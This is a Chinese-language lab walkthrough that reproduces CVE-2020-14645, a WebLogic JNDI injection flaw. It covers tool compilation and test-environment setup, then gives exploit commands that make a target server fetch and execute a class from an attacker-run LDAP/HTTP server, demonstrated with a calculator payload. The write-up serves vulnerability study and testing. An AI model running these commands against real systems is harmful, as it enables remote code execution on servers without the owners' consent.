影響版本
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
漏洞復現工具
JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit
CVE-2020-14645漏洞測試工具
https://github.com/DSO-Lab/defvul
因為電腦上缺少maven的編譯工具,所以我使用的是IDEA自帶的maven工具
工具准備
1.JNDI-Injection-Exploit-master
使用IDEA打開項目

選擇右側的maven工具欄,按下圖進行點擊,將從git上下載的文件java源碼使用maven編譯為jar文件

編譯成功,紅色框為文件輸出位置

2.CVE-2020-14645_Weblogic
使用idea打開項目,進行編譯

實驗環境
java jdk 1.8
https://mega.nz/file/1KIhjSCR#g0s5jekk3F9t55o3WXK_ahozuqn9_60eKSKt70we_uw
WebLogic 12.2.1.4
https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
windows server 2012 (別人拷我的,鏈接就不放了)
實驗環境搭建
1.Java jdk安裝
將下載好的文件拖到虛擬機中,雙擊運行安裝即可

2.WebLogic 12.2.1.4安裝
使用Java -jar命令運行jar文件,如果提示不是有效的jdk java目錄,就將jar文件放置在<JDK>\bin目錄下使用java運行(踩了個坑)

一直下一步,勾選自助啟動配置向導選項

進入配置向導,創建新域並勾選全部模板



安裝完成之后進入域的安裝位置,運行startWeblogic.cmd文件
cd C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\
startWeblogic.cmd

瀏覽器訪問http://localhost:7001/console/login/LoginForm.jsp

環境搭建成功!開始正式測試
漏洞復現
1.執行JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件,需要占用的8180、1099、1389端口(-A [address]ip為目標ip)
使用方式
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 192.168.233.135

2.執行CVE-2020-14645_Weblogic.jar文件
使用方式 (LDAP_IP:LDAP_PORT/#Exploit為本機ip監聽的1389端口的地址)(第一個ip為本機ip,第二ip為攻擊ip,本機ip后面的/#Exploit路徑為JNDI-Injection-Exploit-1.0-SNAPSHOT-all生成的路徑1389對應的路徑)
java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit http://<targetIP>:7001
java -jar CVE-2020-14645.jar 192.168.101.209:1389/jqcrvc http://192.168.233.135:7001


提示Send LDAP reference result for 1xnkli redirecting to http://192.168.233.135:8180/ExecTemplateJDK8.class 調用成功

細心的小伙伴應該發現了,搭建環境使用的是2008,主要是懶得重新搭建環境了,就從大佬文章中直接抄襲了,望海涵 參考連接https://blog.csdn.net/suiyideali/article/details/109061125
